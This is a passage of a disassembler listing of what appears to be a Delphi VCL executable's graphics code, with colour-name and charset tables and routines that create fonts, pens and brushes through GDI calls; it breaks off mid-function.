sub_400148FC proc near ; CODE XREF: sub_40014F8C+1EE�p
; sub_400151D0+80�p ...
add eax, 8
push eax
call sub_400065E8 ; RtlLeaveCriticalSection
retn
sub_400148FC endp
; ---------------------------------------------------------------------------
align 4
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_7. PRESS KEYPAD "+" TO EXPAND]
align 4
loc_4001490C: ; DATA XREF: .text:40014874�o
cmp byte ptr [edx+1Dh], 0
jz short locret_4001491A
lea eax, [edx+18h]
call sub_4000C970
locret_4001491A: ; CODE XREF: .text:40014910�j
retn
; ---------------------------------------------------------------------------
align 4
dword_4001491C dd 0FFFFFFFFh, 7, 6C426C63h, 6B6361h, 0FFFFFFFFh, 8, 614D6C63h
; DATA XREF: .data:4001AADC�o
dd 6E6F6F72h, 0
dword_40014940 dd 0FFFFFFFFh, 7, 72476C63h, 6E6565h, 0FFFFFFFFh, 7, 6C4F6C63h
; DATA XREF: .data:4001AAEC�o
dd 657669h, 0FFFFFFFFh, 6, 614E6C63h, 7976h, 0FFFFFFFFh
dd 8, 75506C63h, 656C7072h, 0
dword_40014984 dd 0FFFFFFFFh, 6, 65546C63h, 6C61h, 0FFFFFFFFh, 6, 72476C63h
; DATA XREF: .data:4001AB0C�o
dd 7961h, 0FFFFFFFFh, 8, 69536C63h, 7265766Ch, 0
dword_400149B8 dd 0FFFFFFFFh, 5, 65526C63h, 64h, 0FFFFFFFFh, 6, 694C6C63h
; DATA XREF: .data:4001AB24�o
dd 656Dh, 0FFFFFFFFh, 8, 65596C63h, 776F6C6Ch, 0
dword_400149EC dd 0FFFFFFFFh, 6, 6C426C63h, 6575h, 0FFFFFFFFh, 9, 75466C63h
; DATA XREF: .data:4001AB3C�o
dd 69736863h, 61h, 0FFFFFFFFh, 6, 71416C63h, 6175h, 0FFFFFFFFh
dd 7, 68576C63h, 657469h, 0FFFFFFFFh, 0Ch, 6F4D6C63h, 4779656Eh
dd 6E656572h, 0
dword_40014A48 dd 0FFFFFFFFh, 9, 6B536C63h, 756C4279h, 65h, 0FFFFFFFFh
; DATA XREF: .data:4001AB64�o
dd 7, 72436C63h, 6D6165h, 0FFFFFFFFh, 9, 654D6C63h, 61724764h
dd 79h, 0FFFFFFFFh, 0Eh, 63416C63h, 65766974h, 64726F42h
dd 7265h, 0FFFFFFFFh, 0Fh, 63416C63h, 65766974h, 74706143h
dd 6E6F69h, 0FFFFFFFFh, 0Eh, 70416C63h, 726F5770h, 6170536Bh
dd 6563h, 0FFFFFFFFh, 0Ch, 61426C63h, 72676B63h, 646E756Fh
dd 0
dword_40014AE0 dd 0FFFFFFFFh, 9, 74426C63h, 6361466Eh, 65h, 0FFFFFFFFh
; DATA XREF: .data:4001AB9C�o
dd 0Eh, 74426C63h, 6769486Eh, 67696C68h, 7468h, 0FFFFFFFFh
dd 0Bh, 74426C63h, 6168536Eh, 776F64h, 0FFFFFFFFh, 9, 74426C63h
dd 7865546Eh, 74h, 0FFFFFFFFh, 0Dh, 61436C63h, 6F697470h
dd 7865546Eh, 74h, 0FFFFFFFFh, 9, 65446C63h, 6C756166h
dd 74h, 0FFFFFFFFh, 17h, 72476C63h, 65696461h, 6341746Eh
dd 65766974h, 74706143h, 6E6F69h, 0FFFFFFFFh, 19h, 72476C63h
dd 65696461h, 6E49746Eh, 69746361h, 61436576h, 6F697470h
dd 6Eh, 0FFFFFFFFh, 0Ah, 72476C63h, 65547961h, 7478h, 0FFFFFFFFh
dd 0Bh, 69486C63h, 696C6867h, 746867h, 0FFFFFFFFh, 0Fh
dd 69486C63h, 696C6867h, 54746867h, 747865h, 0FFFFFFFFh
dd 0Ah, 6F486C63h, 67694C74h, 7468h, 0FFFFFFFFh, 10h, 6E496C63h
dd 69746361h, 6F426576h, 72656472h, 0
dword_40014C14 dd 0FFFFFFFFh, 11h, 6E496C63h, 69746361h, 61436576h, 6F697470h
; DATA XREF: .data:4001AC04�o
dd 6Eh, 0FFFFFFFFh, 15h, 6E496C63h, 69746361h, 61436576h
dd 6F697470h, 7865546Eh, 74h, 0FFFFFFFFh, 8, 6E496C63h
dd 6B426F66h, 0
dword_40014C64 dd 0FFFFFFFFh, 0Ah, 6E496C63h, 65546F66h, 7478h, 0FFFFFFFFh
; DATA XREF: .data:4001AC1C�o
dd 6, 654D6C63h, 756Eh, 0FFFFFFFFh, 9, 654D6C63h, 6142756Eh
dd 72h, 0FFFFFFFFh, 0Fh, 654D6C63h, 6948756Eh, 696C6867h
dd 746867h, 0FFFFFFFFh, 0Ah, 654D6C63h, 6554756Eh, 7478h
dd 0FFFFFFFFh, 6, 6F4E6C63h, 656Eh, 0FFFFFFFFh, 0Bh, 63536C63h
dd 6C6C6F72h, 726142h, 0FFFFFFFFh, 0Ch, 44336C63h, 68536B44h
dd 776F6461h, 0
dword_40014D04 dd 0FFFFFFFFh, 9, 44336C63h, 6867694Ch, 74h, 0FFFFFFFFh
; DATA XREF: .data:4001AC5C�o
dd 8, 69576C63h, 776F646Eh, 0
dword_40014D2C dd 0FFFFFFFFh, 0Dh, 69576C63h, 776F646Eh, 6D617246h, 65h
; DATA XREF: .data:4001AC6C�o
dd 0FFFFFFFFh, 0Ch, 69576C63h, 776F646Eh, 74786554h, 0
; =============== S U B R O U T I N E =======================================
sub_40014D5C proc near ; CODE XREF: sub_400151D0+57�p
; sub_40015270+9F�p ...
test eax, eax
jge short locret_40014D6B
and eax, 0FFh
push eax
call sub_40006720 ; GetSysColor
locret_40014D6B: ; CODE XREF: sub_40014D5C+2�j
retn
sub_40014D5C endp
; =============== S U B R O U T I N E =======================================
sub_40014D6C proc near ; DATA XREF: .itext:4001936E�o
push 33h
mov ecx, offset dword_4001AAD8
call sub_40013658
retn
sub_40014D6C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40014D7C proc near ; DATA XREF: .itext:40019373�o
push 33h
mov ecx, offset dword_4001AAD8
call sub_40013618
retn
sub_40014D7C endp
; ---------------------------------------------------------------------------
align 4
dword_40014D8C dd 0FFFFFFFFh, 0Ch, 49534E41h, 4148435Fh, 54455352h, 0
; DATA XREF: .data:4001AC7C�o
dword_40014DA4 dd 0FFFFFFFFh, 0Fh, 41464544h, 5F544C55h, 52414843h, 544553h
; DATA XREF: .data:4001AC84�o
dd 0FFFFFFFFh, 0Eh, 424D5953h, 435F4C4Fh, 53524148h, 5445h
dd 0FFFFFFFFh, 0Bh, 5F43414Dh, 52414843h, 544553h, 0FFFFFFFFh
dd 10h, 46494853h, 53494A54h, 4148435Fh, 54455352h, 0
dword_40014E04 dd 0FFFFFFFFh, 0Fh, 474E4148h, 5F4C5545h, 52414843h, 544553h
; DATA XREF: .data:4001ACA4�o
dd 0FFFFFFFFh, 0Dh, 41484F4Ah, 48435F42h, 45535241h, 54h
dd 0FFFFFFFFh, 0Eh, 33324247h, 435F3231h, 53524148h, 5445h
dd 0FFFFFFFFh, 13h, 4E494843h, 42455345h, 5F354749h, 52414843h
dd 544553h, 0FFFFFFFFh, 0Dh, 45455247h, 48435F4Bh, 45535241h
dd 54h, 0FFFFFFFFh, 0Fh, 4B525554h, 5F485349h, 52414843h
dd 544553h, 0FFFFFFFFh, 0Eh, 52424548h, 435F5745h, 53524148h
dd 5445h, 0FFFFFFFFh, 0Eh, 42415241h, 435F4349h, 53524148h
dd 5445h, 0FFFFFFFFh, 0Eh, 544C4142h, 435F4349h, 53524148h
dd 5445h, 0FFFFFFFFh, 0Fh, 53535552h, 5F4E4149h, 52414843h
dd 544553h, 0FFFFFFFFh, 0Ch, 49414854h, 4148435Fh, 54455352h
dd 0
dd 0FFFFFFFFh, 12h
aEasteurope_cha db 'EASTEUROPE_CHARSET',0 ; DATA XREF: .data:4001ACFC�o
align 4
dword_40014F2C dd 0FFFFFFFFh, 0Bh, 5F4D454Fh, 52414843h, 544553h
; DATA XREF: .data:4001AD04�o
; ---------------------------------------------------------------------------
loc_40014F40: ; DATA XREF: .itext:40019382�o
push 11h
mov ecx, offset dword_4001AC78
call sub_40013658
retn
; ---------------------------------------------------------------------------
align 10h
loc_40014F50: ; DATA XREF: .itext:40019387�o
push 11h
mov ecx, offset dword_4001AC78
call sub_40013618
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40014F60 proc near ; CODE XREF: sub_40014F8C+187�p
push ebx
mov ebx, eax
movzx eax, byte ptr [ebx+0Eh]
cmp al, byte_4001AAB6
jnz short loc_40014F82
mov eax, offset byte_4001AAB7
lea edx, [ebx+0Fh]
movzx ecx, byte ptr [eax]
inc ecx
call sub_40003510
jz short loc_40014F86
loc_40014F82: ; CODE XREF: sub_40014F60+D�j
xor eax, eax
pop ebx
retn
; ---------------------------------------------------------------------------
loc_40014F86: ; CODE XREF: sub_40014F60+20�j
mov al, 1
pop ebx
retn
sub_40014F60 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40014F8C proc near ; CODE XREF: sub_400155A4+6�p
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = byte ptr -2Ch
var_2B = byte ptr -2Bh
var_2A = byte ptr -2Ah
var_29 = byte ptr -29h
var_28 = byte ptr -28h
var_27 = byte ptr -27h
var_26 = byte ptr -26h
var_25 = byte ptr -25h
var_24 = byte ptr -24h
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFFB0h
push ebx
push esi
push edi
xor edx, edx
mov [ebp+var_50], edx
mov [ebp+var_4C], edx
mov [ebp+var_48], edx
mov [ebp+var_44], edx
mov ebx, eax
xor eax, eax
push ebp
push offset loc_400151A8
push dword ptr fs:[eax]
mov fs:[eax], esp
mov eax, [ebx+10h]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
cmp dword ptr [eax+8], 0
jnz loc_40015187
mov eax, ds:dword_4001F350
call sub_400148F0
xor edx, edx
push ebp
push offset loc_40015180
push dword ptr fs:[edx]
mov fs:[edx], esp
mov eax, [ebp+var_4]
cmp dword ptr [eax+8], 0
jnz loc_40015168
mov eax, [ebp+var_4]
mov eax, [eax+14h]
mov [ebp+var_40], eax
xor eax, eax
mov [ebp+var_3C], eax
mov eax, [ebp+var_4]
mov eax, [eax+18h]
mov [ebp+var_38], eax
mov [ebp+var_34], eax
mov eax, [ebp+var_4]
test byte ptr [eax+1Dh], 1
jz short loc_40015017
mov [ebp+var_30], 2BCh
jmp short loc_4001501E
; ---------------------------------------------------------------------------
loc_40015017: ; CODE XREF: sub_40014F8C+80�j
mov [ebp+var_30], 190h
loc_4001501E: ; CODE XREF: sub_40014F8C+89�j
mov eax, [ebp+var_4]
test byte ptr [eax+1Dh], 2
setnz al
mov [ebp+var_2C], al
mov eax, [ebp+var_4]
test byte ptr [eax+1Dh], 4
setnz al
mov [ebp+var_2B], al
mov eax, [ebp+var_4]
test byte ptr [eax+1Dh], 8
setnz al
mov [ebp+var_2A], al
mov eax, [ebp+var_4]
movzx eax, byte ptr [eax+1Eh]
cmp al, 1
jnz short loc_40015065
cmp byte_4001AAB6, 1
jz short loc_40015065
movzx eax, byte_4001AAB6
mov [ebp+var_29], al
jmp short loc_40015068
; ---------------------------------------------------------------------------
loc_40015065: ; CODE XREF: sub_40014F8C+C2�j
; sub_40014F8C+CB�j
mov [ebp+var_29], al
loc_40015068: ; CODE XREF: sub_40014F8C+D7�j
lea eax, [ebp+var_44]
mov edx, [ebp+var_4]
add edx, 1Fh
call sub_40004AE8
mov esi, [ebp+var_44]
test esi, esi
jz short loc_40015082
sub esi, 4
mov esi, [esi]
loc_40015082: ; CODE XREF: sub_40014F8C+EF�j
mov edi, offset aDefault ; "Default"
test edi, edi
jz short loc_40015090
sub edi, 4
mov edi, [edi]
loc_40015090: ; CODE XREF: sub_40014F8C+FD�j
push edi
mov eax, offset aDefault ; "Default"
call sub_40004D48
push eax
push esi
lea eax, [ebp+var_48]
mov edx, [ebp+var_4]
add edx, 1Fh
call sub_40004AE8
mov eax, [ebp+var_48]
call sub_40004D48
push eax
push 1
push 400h
call sub_400064F8 ; CompareStringA
sub eax, 2
test eax, eax
jnz short loc_400150E1
lea eax, [ebp+var_4C]
mov edx, offset byte_4001AAB7
call sub_40004AE8
mov edx, [ebp+var_4C]
lea eax, [ebp+var_24]
call sub_400081B8
jmp short loc_400150FA
; ---------------------------------------------------------------------------
loc_400150E1: ; CODE XREF: sub_40014F8C+139�j
lea eax, [ebp+var_50]
mov edx, [ebp+var_4]
add edx, 1Fh
call sub_40004AE8
mov edx, [ebp+var_50]
lea eax, [ebp+var_24]
call sub_400081B8
loc_400150FA: ; CODE XREF: sub_40014F8C+153�j
mov eax, off_4001B0C8
cmp dword ptr [eax], 1
jnz short loc_40015120
call sub_40015918
cmp al, 80h
jnz short loc_40015120
mov eax, [ebp+var_4]
add eax, 10h
call sub_40014F60
test al, al
jz short loc_40015120
mov [ebp+var_29], 80h
loc_40015120: ; CODE XREF: sub_40014F8C+176�j
; sub_40014F8C+17F�j ...
mov [ebp+var_26], 0
cmp [ebp+var_34], 0
jz short loc_40015130
mov [ebp+var_28], 7
jmp short loc_40015134
; ---------------------------------------------------------------------------
loc_40015130: ; CODE XREF: sub_40014F8C+19C�j
mov [ebp+var_28], 0
loc_40015134: ; CODE XREF: sub_40014F8C+1A2�j
mov [ebp+var_27], 0
mov eax, ebx
call sub_400151C8
dec al
jz short loc_40015149
dec al
jz short loc_4001514F
jmp short loc_40015155
; ---------------------------------------------------------------------------
loc_40015149: ; CODE XREF: sub_40014F8C+1B5�j
mov [ebp+var_25], 2
jmp short loc_40015159
; ---------------------------------------------------------------------------
loc_4001514F: ; CODE XREF: sub_40014F8C+1B9�j
mov [ebp+var_25], 1
jmp short loc_40015159
; ---------------------------------------------------------------------------
loc_40015155: ; CODE XREF: sub_40014F8C+1BB�j
mov [ebp+var_25], 0
loc_40015159: ; CODE XREF: sub_40014F8C+1C1�j
; sub_40014F8C+1C7�j
lea eax, [ebp+var_40]
push eax
call sub_40006678 ; CreateFontIndirectA
mov edx, [ebp+var_4]
mov [edx+8], eax
loc_40015168: ; CODE XREF: sub_40014F8C+59�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_40015187
loc_40015175: ; CODE XREF: sub_40014F8C+1F9�j
mov eax, ds:dword_4001F350
call sub_400148FC
retn
; ---------------------------------------------------------------------------
loc_40015180: ; DATA XREF: sub_40014F8C+47�o
jmp loc_40004204
; ---------------------------------------------------------------------------
jmp short loc_40015175
; ---------------------------------------------------------------------------
loc_40015187: ; CODE XREF: sub_40014F8C+34�j
; sub_40014F8C+1F3�j
; DATA XREF: ...
mov eax, [ebp+var_4]
mov ebx, [eax+8]
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_400151AF
loc_4001519A: ; CODE XREF: sub_40014F8C+221�j
lea eax, [ebp+var_50]
mov edx, 4
call sub_400048A8
retn
; ---------------------------------------------------------------------------
loc_400151A8: ; DATA XREF: sub_40014F8C+1C�o
jmp loc_40004204
; ---------------------------------------------------------------------------
jmp short loc_4001519A
; ---------------------------------------------------------------------------
loc_400151AF: ; CODE XREF: sub_40014F8C+21B�j
; DATA XREF: sub_40014F8C+209�o
mov eax, ebx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_40014F8C endp
; ---------------------------------------------------------------------------
dd 0FFFFFFFFh, 7
aDefault db 'Default',0 ; DATA XREF: sub_40014F8C:loc_40015082�o
; sub_40014F8C+105�o
; =============== S U B R O U T I N E =======================================
sub_400151C8 proc near ; CODE XREF: sub_40014F8C+1AE�p
mov eax, [eax+10h]
movzx eax, byte ptr [eax+1Ch]
retn
sub_400151C8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_400151D0 proc near ; CODE XREF: sub_400155D0+6�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFFECh
mov eax, [eax+10h]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
cmp dword ptr [eax+8], 0
jnz short loc_4001525D
mov eax, ds:dword_4001F354
call sub_400148F0
xor eax, eax
push ebp
push offset loc_40015256
push dword ptr fs:[eax]
mov fs:[eax], esp
mov eax, [ebp+var_4]
cmp dword ptr [eax+8], 0
jnz short loc_4001523E
mov eax, [ebp+var_4]
movzx eax, byte ptr [eax+1Ch]
movzx eax, word_4001AD08[eax*2]
mov [ebp+var_14], eax
mov eax, [ebp+var_4]
mov eax, [eax+18h]
mov [ebp+var_10], eax
mov eax, [ebp+var_4]
mov eax, [eax+14h]
call sub_40014D5C
mov [ebp+var_8], eax
lea eax, [ebp+var_14]
push eax
call sub_40006688 ; CreatePenIndirect
mov edx, [ebp+var_4]
mov [edx+8], eax
loc_4001523E: ; CODE XREF: sub_400151D0+34�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_4001525D
loc_4001524B: ; CODE XREF: sub_400151D0+8B�j
mov eax, ds:dword_4001F354
call sub_400148FC
retn
; ---------------------------------------------------------------------------
loc_40015256: ; DATA XREF: sub_400151D0+22�o
jmp loc_40004204
; ---------------------------------------------------------------------------
jmp short loc_4001524B
; ---------------------------------------------------------------------------
loc_4001525D: ; CODE XREF: sub_400151D0+13�j
; sub_400151D0+85�j
; DATA XREF: ...
mov eax, [ebp+var_4]
mov eax, [eax+8]
mov esp, ebp
pop ebp
retn
sub_400151D0 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40015268 proc near ; CODE XREF: sub_40015600+32�p
; sub_40015600+56�p
mov eax, [eax+10h]
mov eax, [eax+14h]
retn
sub_40015268 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40015270 proc near ; CODE XREF: sub_40015600+6�p
; sub_40015600+14�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFFF0h
mov eax, [eax+10h]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
cmp dword ptr [eax+8], 0
jnz loc_40015345
mov eax, ds:dword_4001F358
call sub_400148F0
xor edx, edx
push ebp
push offset loc_4001533E
push dword ptr fs:[edx]
mov fs:[edx], esp
mov eax, [ebp+var_4]
cmp dword ptr [eax+8], 0
jnz short loc_40015326
mov eax, [ebp+var_4]
mov eax, [eax+18h]
test eax, eax
jz short loc_400152D2
mov [ebp+var_10], 3
mov dl, 1
mov ecx, [eax]
call dword ptr [ecx+70h]
mov eax, [ebp+var_4]
mov eax, [eax+18h]
mov edx, [eax]
call dword ptr [edx+68h]
mov [ebp+var_8], eax
jmp short loc_40015309
; ---------------------------------------------------------------------------
loc_400152D2: ; CODE XREF: sub_40015270+42�j
xor eax, eax
mov [ebp+var_8], eax
mov eax, [ebp+var_4]
movzx eax, byte ptr [eax+1Ch]
mov edx, eax
sub dl, 1
jb short loc_400152E9
jz short loc_400152F0
jmp short loc_400152F9
; ---------------------------------------------------------------------------
loc_400152E9: ; CODE XREF: sub_40015270+73�j
xor eax, eax
mov [ebp+var_10], eax
jmp short loc_40015309
; ---------------------------------------------------------------------------
loc_400152F0: ; CODE XREF: sub_40015270+75�j
mov [ebp+var_10], 1
jmp short loc_40015309
; ---------------------------------------------------------------------------
loc_400152F9: ; CODE XREF: sub_40015270+77�j
mov [ebp+var_10], 2
and eax, 7Fh
sub eax, 2
mov [ebp+var_8], eax
loc_40015309: ; CODE XREF: sub_40015270+60�j
; sub_40015270+7E�j ...
mov eax, [ebp+var_4]
mov eax, [eax+14h]
call sub_40014D5C
mov [ebp+var_C], eax
lea eax, [ebp+var_10]
push eax
call sub_40006670 ; CreateBrushIndirect
mov edx, [ebp+var_4]
mov [edx+8], eax
loc_40015326: ; CODE XREF: sub_40015270+38�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_40015345
loc_40015333: ; CODE XREF: sub_40015270+D3�j
mov eax, ds:dword_4001F358
call sub_400148FC
retn
; ---------------------------------------------------------------------------
loc_4001533E: ; DATA XREF: sub_40015270+26�o
jmp loc_40004204
; ---------------------------------------------------------------------------
jmp short loc_40015333
; ---------------------------------------------------------------------------
loc_40015345: ; CODE XREF: sub_40015270+13�j
; sub_40015270+CD�j
; DATA XREF: ...
mov eax, [ebp+var_4]
mov eax, [eax+8]
mov esp, ebp
pop ebp
retn
sub_40015270 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40015350 proc near ; CODE XREF: sub_40015600+26�p
mov eax, [eax+10h]
movzx eax, byte ptr [eax+1Ch]
retn
sub_40015350 endp
; =============== S U B R O U T I N E =======================================
sub_40015358 proc near ; CODE XREF: sub_400153AC+2F�p
; sub_40015840+18�p
push ebx
mov ebx, eax
push offset dword_4001F338
call sub_40006520 ; RtlEnterCriticalSection
inc dword ptr [ebx+50h]
push offset dword_4001F338
call sub_400065E8 ; RtlLeaveCriticalSection
lea eax, [ebx+38h]
push eax
call sub_40006520 ; RtlEnterCriticalSection
pop ebx
retn
sub_40015358 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40015380 proc near ; CODE XREF: sub_40015458+13�p
push ebx
push esi
push edi
mov edi, ecx
mov esi, edx
mov ebx, eax
movzx edx, ds:byte_400153A8
mov eax, ebx
call sub_4001552C
push 0
push edi
push esi
mov eax, [ebx+4]
push eax
call sub_400066C8 ; MoveToEx
pop edi
pop esi
pop ebx
retn
sub_40015380 endp
; ---------------------------------------------------------------------------
byte_400153A8 db 1 ; DATA XREF: sub_40015380+9�r
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_400153AC proc near ; CODE XREF: sub_40015794+41�p
var_1 = byte ptr -1
push ebp
mov ebp, esp
push ecx
push ebx
mov ebx, eax
push offset dword_4001F338
call sub_40006520 ; RtlEnterCriticalSection
xor eax, eax
push ebp
push offset loc_400153F8
push dword ptr fs:[eax]
mov fs:[eax], esp
cmp dword ptr [ebx+50h], 0
setz [ebp+var_1]
cmp [ebp+var_1], 0
jz short loc_400153E0
mov eax, ebx
call sub_40015358
loc_400153E0: ; CODE XREF: sub_400153AC+2B�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_400153FF
loc_400153ED: ; CODE XREF: sub_400153AC+51�j
push offset dword_4001F338
call sub_400065E8 ; RtlLeaveCriticalSection
retn
; ---------------------------------------------------------------------------
loc_400153F8: ; DATA XREF: sub_400153AC+14�o
jmp loc_40004204
; ---------------------------------------------------------------------------
jmp short loc_400153ED
; ---------------------------------------------------------------------------
loc_400153FF: ; DATA XREF: sub_400153AC+3C�o
movzx eax, [ebp+var_1]
pop ebx
pop ecx
pop ebp
retn
sub_400153AC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40015408 proc near ; CODE XREF: sub_40015794+70�p
; sub_40015840+8E�p
push ebx
mov ebx, eax
lea eax, [ebx+38h]
push eax
call sub_400065E8 ; RtlLeaveCriticalSection
push offset dword_4001F338
call sub_40006520 ; RtlEnterCriticalSection
dec dword ptr [ebx+50h]
push offset dword_4001F338
call sub_400065E8 ; RtlLeaveCriticalSection
pop ebx
retn
sub_40015408 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40015430 proc near ; CODE XREF: sub_400154D8+1F�p
push ebx
push esi
mov esi, edx
mov ebx, eax
movzx edx, ds:byte_40015454
mov eax, ebx
call sub_4001552C
push esi
mov eax, [ebx+4]
push eax
call sub_400066A0 ; GetCurrentPositionEx
pop esi
pop ebx
retn
sub_40015430 endp
; ---------------------------------------------------------------------------
align 4
byte_40015454 db 1 ; DATA XREF: sub_40015430+6�r
align 4
; =============== S U B R O U T I N E =======================================
sub_40015458 proc near ; CODE XREF: sub_400154D8+4A�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
push esi
push edi
add esp, 0FFFFFFF8h
mov esi, edx
lea edi, [esp+10h+var_10]
movsd
movsd
mov ecx, [esp+10h+var_C]
mov edx, [esp+10h+var_10]
call sub_40015380
pop ecx
pop edx
pop edi
pop esi
retn
sub_40015458 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40015478 proc near ; CODE XREF: sub_400154D8+16�p
push ebx
push esi
mov ebx, eax
mov esi, [ebx+4]
test esi, esi
jz short loc_400154D0
movzx eax, ds:byte_400154D4
not eax
and al, [ebx+8]
movzx edx, byte ptr [ebx+8]
cmp dl, al
jz short loc_400154D0
mov eax, ds:dword_4001F310
push eax
push esi
call sub_400066D0 ; SelectObject
mov eax, ds:dword_4001F314
push eax
mov eax, [ebx+4]
push eax
call sub_400066D0 ; SelectObject
mov eax, ds:dword_4001F318
push eax
mov eax, [ebx+4]
push eax
call sub_400066D0 ; SelectObject
movzx eax, ds:byte_400154D4
not eax
and al, [ebx+8]
mov [ebx+8], al
loc_400154D0: ; CODE XREF: sub_40015478+9�j
; sub_40015478+1D�j
pop esi
pop ebx
retn
sub_40015478 endp
; ---------------------------------------------------------------------------
align 4
byte_400154D4 db 0Eh ; DATA XREF: sub_40015478+B�r
; sub_40015478+49�r
align 4
; =============== S U B R O U T I N E =======================================
sub_400154D8 proc near ; CODE XREF: sub_40015840+66�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
push ebx
push esi
add esp, 0FFFFFFF8h
mov esi, edx
mov ebx, eax
mov eax, [ebx+4]
cmp esi, eax
jz short loc_40015527
test eax, eax
jz short loc_40015512
mov eax, ebx
call sub_40015478
mov edx, esp
mov eax, ebx
call sub_40015430
mov eax, [esp+10h+var_10]
mov [ebx+18h], eax
mov eax, [esp+10h+var_C]
mov [ebx+1Ch], eax
xor eax, eax
mov [ebx+4], eax
and byte ptr [ebx+8], 0FEh
loc_40015512: ; CODE XREF: sub_400154D8+12�j
test esi, esi
jz short loc_40015527
or byte ptr [ebx+8], 1
mov [ebx+4], esi
lea edx, [ebx+18h]
mov eax, ebx
call sub_40015458
loc_40015527: ; CODE XREF: sub_400154D8+E�j
; sub_400154D8+3C�j
pop ecx
pop edx
pop esi
pop ebx
retn
sub_400154D8 endp
; =============== S U B R O U T I N E =======================================
sub_4001552C proc near ; CODE XREF: sub_40015380+12�p
; sub_40015430+F�p
var_C = byte ptr -0Ch
push ebx
push esi
push ecx
mov [esp+0Ch+var_C], dl
mov esi, eax
movzx ebx, byte ptr [esi+8]
not ebx
and bl, [esp+0Ch+var_C]
movzx eax, ds:byte_400155A0
cmp al, bl
jz short loc_4001559B
test bl, 1
jz short loc_40015571
mov eax, esi
mov edx, [eax]
call dword ptr [edx+14h]
cmp dword ptr [esi+4], 0
jnz short loc_40015571
mov ecx, off_4001AF68
mov dl, 1
mov eax, ds:off_40012FE0
call sub_4000B0EC
call sub_400042E4
loc_40015571: ; CODE XREF: sub_4001552C+1F�j
; sub_4001552C+2C�j
test bl, 2
jz short loc_4001557D
mov eax, esi
call sub_400155A4
loc_4001557D: ; CODE XREF: sub_4001552C+48�j
test bl, 4
jz short loc_40015589
mov eax, esi
call sub_400155D0
loc_40015589: ; CODE XREF: sub_4001552C+54�j
test bl, 8
jz short loc_40015595
mov eax, esi
call sub_40015600
loc_40015595: ; CODE XREF: sub_4001552C+60�j
or bl, [esi+8]
mov [esi+8], bl
loc_4001559B: ; CODE XREF: sub_4001552C+1A�j
pop edx
pop esi
pop ebx
retn
sub_4001552C endp
; ---------------------------------------------------------------------------
align 10h
byte_400155A0 db 0 ; DATA XREF: sub_4001552C+11�r
align 4
; =============== S U B R O U T I N E =======================================
sub_400155A4 proc near ; CODE XREF: sub_4001552C+4C�p
push ebx
mov ebx, eax
mov eax, [ebx+0Ch]
call sub_40014F8C
push eax
mov eax, [ebx+4]
push eax
call sub_400066D0 ; SelectObject
mov eax, [ebx+0Ch]
mov eax, [eax+18h]
call sub_40014D5C
push eax
mov eax, [ebx+4]
push eax
call sub_400066F8 ; SetTextColor
pop ebx
retn
sub_400155A4 endp
; =============== S U B R O U T I N E =======================================
sub_400155D0 proc near ; CODE XREF: sub_4001552C+58�p
push ebx
mov ebx, eax
mov eax, [ebx+10h]
call sub_400151D0
push eax
mov eax, [ebx+4]
push eax
call sub_400066D0 ; SelectObject
mov eax, [ebx+10h]
movzx eax, byte ptr [eax+18h]
movzx eax, word_4001AD1C[eax*2]
push eax
mov eax, [ebx+4]
push eax
call sub_400066F0 ; SetROP2
pop ebx
retn
sub_400155D0 endp
; =============== S U B R O U T I N E =======================================
sub_40015600 proc near ; CODE XREF: sub_4001552C+64�p
push ebx
mov ebx, eax
mov eax, [ebx+14h]
call sub_40015270
push eax
call sub_40006700 ; UnrealizeObject
mov eax, [ebx+14h]
call sub_40015270
push eax
mov eax, [ebx+4]
push eax
call sub_400066D0 ; SelectObject
mov eax, [ebx+14h]
call sub_40015350
test al, al
jnz short loc_40015653
mov eax, [ebx+14h]
call sub_40015268
call sub_40014D5C
push eax
mov eax, [ebx+4]
push eax
call sub_400066E0 ; SetBkColor
push 2
mov eax, [ebx+4]
push eax
call sub_400066E8 ; SetBkMode
pop ebx
retn
; ---------------------------------------------------------------------------
loc_40015653: ; CODE XREF: sub_40015600+2D�j
mov eax, [ebx+14h]
call sub_40015268
call sub_40014D5C
not eax
push eax
mov eax, [ebx+4]
push eax
